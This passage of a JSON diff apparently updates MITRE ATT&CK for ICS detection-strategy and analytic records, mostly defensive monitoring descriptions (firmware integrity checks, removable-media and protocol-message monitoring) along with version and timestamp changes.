+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ffeac6e1-798f-41b1-8baf-2650d2ebe031",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0724",
+                            "external_id": "DET0724"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Valid Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ddfcd948-3526-4241-a12f-d7bf63468e40"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7f32731d-7800-483c-b077-c4a187a27ae5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0726",
+                            "external_id": "DET0726"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Wireless Compromise",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2388dc31-ba9a-4c12-b4b9-28bbc981c73e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bbb288c7-9e40-46bd-b0a1-db4cfef4e1ee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0743",
+                            "external_id": "DET0743"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Wireless Sniffing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c14544a4-5ca1-4523-97eb-4a9840d74c6d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "analytics": {
+            "additions": [
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--2b751a3d-c680-46c9-b92b-55a9d24bd4f9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-05-04 13:53:11.589000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0748#AN2066",
+                            "external_id": "AN2066"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2066",
+                    "description": "Monitor for newly constructed drive letters or mount points to removable media. Monitor for newly executed processes that execute from removable media after it is mounted or when initiated by a user.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f",
+                            "name": "Drive",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "Process",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0"
+                }
+            ],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--3f10ffe9-fa73-4aeb-bf98-322831bf757f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0731#AN1864",
+                            "external_id": "AN1864"
+                        },
+                        {
+                            "source_name": "McAfee CHIPSEC Blog",
+                            "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.",
+                            "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/"
+                        },
+                        {
+                            "source_name": "MITRE Copernicus",
+                            "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.",
+                            "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about"
+                        },
+                        {
+                            "source_name": "Intel HackingTeam UEFI Rootkit",
+                            "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html"
+                        },
+                        {
+                            "source_name": "Github CHIPSEC",
+                            "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.",
+                            "url": "https://github.com/chipsec/chipsec"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1864",
+                    "description": "Monitor for firmware changes which may be observable via operational alarms from devices.\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd",
+                            "name": "Firmware",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-24 20:33:55.812000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--880a1133-6639-42f0-96a8-3e914426d38b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0790#AN1922",
+                            "external_id": "AN1922"
+                        },
+                        {
+                            "source_name": "McAfee CHIPSEC Blog",
+                            "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.",
+                            "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/"
+                        },
+                        {
+                            "source_name": "MITRE Copernicus",
+                            "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.",
+                            "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about"
+                        },
+                        {
+                            "source_name": "Intel HackingTeam UEFI Rootkit",
+                            "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html"
+                        },
+                        {
+                            "source_name": "Github CHIPSEC",
+                            "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.",
+                            "url": "https://github.com/chipsec/chipsec"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1922",
+                    "description": "Monitor for firmware changes which may be observable via operational alarms from devices.\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd",
+                            "name": "Firmware",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-04-24 20:33:58.916000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--613b28ef-88dd-4008-8d7e-206ce55a7cde",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 14:53:50.597000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0902#AN2045",
+                            "external_id": "AN2045"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2045",
+                    "description": "Unauthorized messages may be detected by reviewing the content of automation protocols, either through detecting based on expected values or comparing to other out of band process data sources. Unauthorized messages may not precisely match legitimate messages which may lead to malformed traffic, although traffic may be malformed for benign reasons. Monitor messages for changes in how they are constructed.\n\nMonitor for anomalous or unexpected messages that may result in changes to the process operation observable via asset application logs (e.g., discrete write, logic and device configuration, mode changes, safety triggers).\n\nConsider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity which may precede this technique.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Traffic",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-24 20:33:56.808000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--c556c91d-64a0-401c-9c41-18971eeca0f2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 15:07:57.495000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0903#AN2046",
+                            "external_id": "AN2046"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2046",
+                    "description": "Monitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.\n\nMonitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.\n\nMonitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.\n\nMonitor for a loss of network communications, which may indicate this technique is being used.\n\nMonitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if messages are blocked.\n\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
+                            "name": "Databases",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-04-24 20:34:00.942000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--fc6641ac-5748-4498-89e9-d4ada2b6f88a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 15:53:18.404000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0904#AN2047",
+                            "external_id": "AN2047"
+                        },
+                        {
+                            "source_name": "McAfee CHIPSEC Blog",
+                            "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.",
+                            "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/"
+                        },
+                        {
+                            "source_name": "MITRE Copernicus",
+                            "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.",
+                            "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about"
+                        },
+                        {
+                            "source_name": "Intel HackingTeam UEFI Rootkit",
+                            "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html"
+                        },
+                        {
+                            "source_name": "Github CHIPSEC",
+                            "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.",
+                            "url": "https://github.com/chipsec/chipsec"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2047",
+                    "description": "Monitor for firmware changes which may be observable via operational alarms from devices.\n\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\n\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\n\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd",
+                            "name": "Firmware",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2026-04-24 20:34:04.333000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--1017530e-423d-4857-80b6-99891bf82d28",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 16:28:31.400000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0905#AN2048",
+                            "external_id": "AN2048"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2048",
+                    "description": "Monitor network traffic for insecure credential use in protocols that allow unencrypted authentication.\n\nMonitor logon sessions for insecure credential use, when feasible.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5",
+                            "name": "Logon Session",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-04-24 20:33:52.442000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--6a510bf0-0289-4eb0-8645-89f0f4d32cf3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 17:53:18.908000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0906#AN2049",
+                            "external_id": "AN2049"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2049",
+                    "description": "Monitor for unexpected changes to project files, although if the malicious modification occurs in tandem with legitimate changes it will be difficult to isolate the unintended changes by analyzing only file systems modifications.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                            "name": "File",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-24 20:33:57.629000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--51a094bf-b7eb-452a-9b7a-ffac16fce1ac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 18:49:31.209000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0907#AN2050",
+                            "external_id": "AN2050"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2050",
+                    "description": "Monitor for new processes engaging in scanning activity or connecting to multiple systems by correlating process creation network data.\n\nMonitor for hosts enumerating network connected resources using non-ICS enterprise protocols.  \n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                            "name": "Network",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-24 20:33:56.263000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f6324642-d17d-49d4-90b2-bab9d229d6fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 20:31:39.088000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0908#AN2051",
+                            "external_id": "AN2051"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2051",
